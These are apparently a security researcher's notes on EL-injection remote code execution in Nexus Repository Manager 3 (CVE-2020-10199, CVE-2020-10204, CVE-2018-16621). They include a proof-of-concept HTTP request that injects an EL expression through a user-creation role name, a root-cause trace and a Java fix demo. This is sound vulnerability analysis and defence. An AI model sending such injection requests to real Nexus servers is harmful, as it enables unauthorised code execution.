[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE

References

  • https://support.sonatype.com/hc/en-us/articles/360044882533
  • https://cloud.tencent.com/announce/detail/1023
  • https://mp.weixin.qq.com/s/xUWPVwcNL6n6snn_gV_UwA
  • https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
  • https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf

Vulnerability description

Never mind the XSS.
RCE:

an attacker with any type of account on NXRM to execute arbitrary code by crafting a malicious request to NXRM

Affected range: 3.21.1

http://download.sonatype.com/nexus/3/nexus-3.21.1-01-unix.tar.gz

Fixed version: 3.21.2

http://download.sonatype.com/nexus/3/nexus-3.21.2-03-unix.tar.gz

CVE-2020-10204

RCE with an administrator account:

The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM.

Reference:
https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

This should be a bypass of CVE-2018-16621.
Reproduced successfully on Mac.
On Windows, it threw this error:

javax.el.ELException: java.lang.IllegalArgumentException: object is not an instance of declaring class

Download of older versions:

https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3

CVE-2018-16621 Nexus EL expression injection

Reference: https://github.com/Cryin/Paper/blob/master/CVE-2018-16621%20Nexus%20Repository%20Manager3%20%E4%BB%BB%E6%84%8FEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5.md

PoC:

POST /service/extdirect HTTP/1.1
Host: 192.168.85.129:8081
Content-Type: application/json
Connection: close
Cookie: fusionauth.locale=zh_CN; remember-me=YWRtaW46MTU4NjQyMDcwNTI5ODo5ZmJhMGViMDFjYjM2MmEzNGU5YWQ2MTExYTYwZWNjNQ; JSESSIONID=FD1D448F8785A262DC6453B773955371; username="FS1YvSKKiX8_"; password="FS1YvSKKiX8_"; rememberme="false"; validation="8ab366e87f98368ce07c2c89f9064073"; XSRF-TOKEN=46b5a232-f694-4e27-930d-9e0163f5e310; NXSESSIONID=e5682534-b930-4491-ab86-aa02e5f32a12
Content-Length: 218

{"action":"coreui_User","method":"create","data":[{"userId":"test123","firstName":"77","lastName":"cai","password":"password","email":"77@qq.com","status":"active","roles":["nx-admin${7776+1}"]}],"type":"rpc","tid":49}

When a role name in the request does not exist, it is added to missing; the check is in
nexus-3.13.0-01\system\org\sonatype\nexus\nexus-security\3.13.0-01\nexus-security-3.13.0-01.jar!\org\sonatype\nexus\security\role\RolesExistValidator#isValid

            // Decompiled fragment of RolesExistValidator#isValid: every requested role ID is
            // looked up, and unknown ones are collected in `missing`, which later ends up in
            // the constraint-violation message template that Hibernate Validator interpolates.
            try {
                this.authorizationManager.getRole(String.valueOf(item));
            } catch (NoSuchRoleException var6) {
                missing.add(item);
            }

Finally traced down to here:
nexus-3.13.0-01\system\org\hibernate\hibernate-validator\5.1.2.Final\hibernate-validator-5.1.2.Final.jar!\org\hibernate\validator\internal\engine\messageinterpolation\InterpolationTerm#interpolateExpressionLanguageTerm

Part of the call stack:

interpolateExpressionLanguageTerm:112, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolate:90, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolateExpression:342, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolateMessage:298, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:182, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:362, ValidationContext (org.hibernate.validator.internal.engine)
createConstraintViolation:271, ValidationContext (org.hibernate.validator.internal.engine)
createConstraintViolations:232, ValidationContext (org.hibernate.validator.internal.engine)
validateSingleConstraint:291, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraints:133, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraints:91, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraint:83, MetaConstraint (org.hibernate.validator.internal.metadata.core)
validateConstraint:547, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForNonDefaultGroup:511, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForCurrentGroup:448, ValidatorImpl (org.hibernate.validator.internal.engine)
validateInContext:403, ValidatorImpl (org.hibernate.validator.internal.engine)
validateCascadedConstraint:723, ValidatorImpl (org.hibernate.validator.internal.engine)
validateCascadedConstraints:601, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParametersInContext:992, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:300, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:254, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:65, ValidationInterceptor (org.sonatype.nexus.validation.internal)
invoke:51, ValidationInterceptor (org.sonatype.nexus.validation.internal)

After it runs, the result confirms that the EL expression really is evaluated here.
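An added example (not the page's or Sonatype's code) of the root cause behind the validator snippet and the call stack above: a value taken from the request is concatenated into a Bean Validation message template, and Hibernate Validator's message interpolation hands any ${...} term in that template to the EL engine. The hypothetical RolesExistDemo class below shows the defensive side: escape every dynamic value before it enters the template and, as a second layer, use the EL-free ParameterMessageInterpolator; it assumes hibernate-validator 5.x and a javax.el implementation on the classpath, and the known-role list is constructed.

```java
import java.lang.annotation.*;
import java.util.*;
import javax.validation.*;
import org.hibernate.validator.messageinterpolation.ParameterMessageInterpolator;

public class RolesExistDemo {
    // Constructed stand-in for authorizationManager.getRole(): the only roles that "exist".
    static final List<String> KNOWN_ROLES = Arrays.asList("nx-admin", "nx-anonymous");
    // Hypothetical constraint modelled on the page's RolesExistValidator (not Nexus code).
    @Constraint(validatedBy = RolesExistValidator.class)
    @Target(ElementType.FIELD) @Retention(RetentionPolicy.RUNTIME)
    public @interface RolesExist {
        String message() default "Unknown roles";
        Class<?>[] groups() default {};
        Class<? extends Payload>[] payload() default {};
    }
    // Escape the characters Bean Validation treats specially in a message template ({ } $ \),
    // so "nx-admin${7776+1}" is rendered literally instead of being evaluated as an EL term.
    static String escapeForTemplate(String s) {
        return s.replaceAll("([\\\\{}$])", "\\\\$1");
    }
    public static class RolesExistValidator implements ConstraintValidator<RolesExist, List<String>> {
        public void initialize(RolesExist a) {}
        public boolean isValid(List<String> roles, ConstraintValidatorContext ctx) {
            List<String> missing = new ArrayList<>();
            for (String r : roles) if (!KNOWN_ROLES.contains(r)) missing.add(r);
            if (missing.isEmpty()) return true;
            ctx.disableDefaultConstraintViolation();
            // Root cause on the page: passing "Missing roles: " + missing straight in makes user
            // input part of the *template*, which the interpolator passes to the EL engine.
            ctx.buildConstraintViolationWithTemplate("Missing roles: " + escapeForTemplate(missing.toString()))
               .addConstraintViolation();
            return false;
        }
    }
    public static class User { @RolesExist public List<String> roles; }
    static String firstMessage(Validator v, String role) {
        User u = new User();
        u.roles = Collections.singletonList(role);
        Set<ConstraintViolation<User>> vs = v.validate(u);
        return vs.isEmpty() ? null : vs.iterator().next().getMessage();
    }
    public static void main(String[] args) {
        String payload = "nx-admin${7776+1}";  // constructed; same shape as the page's PoC role name
        Validator withEl = Validation.buildDefaultValidatorFactory().getValidator();  // EL enabled
        Validator noEl = Validation.byDefaultProvider().configure()  // second layer: no EL at all
                .messageInterpolator(new ParameterMessageInterpolator()).buildValidatorFactory().getValidator();
        System.out.println(firstMessage(withEl, payload));
        System.out.println(firstMessage(noEl, payload));
    }
}
```

With the escaping in place the first validator prints the role name verbatim instead of "7777"; the second one never evaluates EL, so it is the safer default for any message template that can contain request data.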

Ran into an error like this:

Reference:
https://*.com/questions/53021763/cannot-open-local-storage-nexus3-db-config-with-mode-rw-db-name-config

Moved nexus to a different directory; it was probably conflicting with the OrientDB of the nexus instance started earlier.
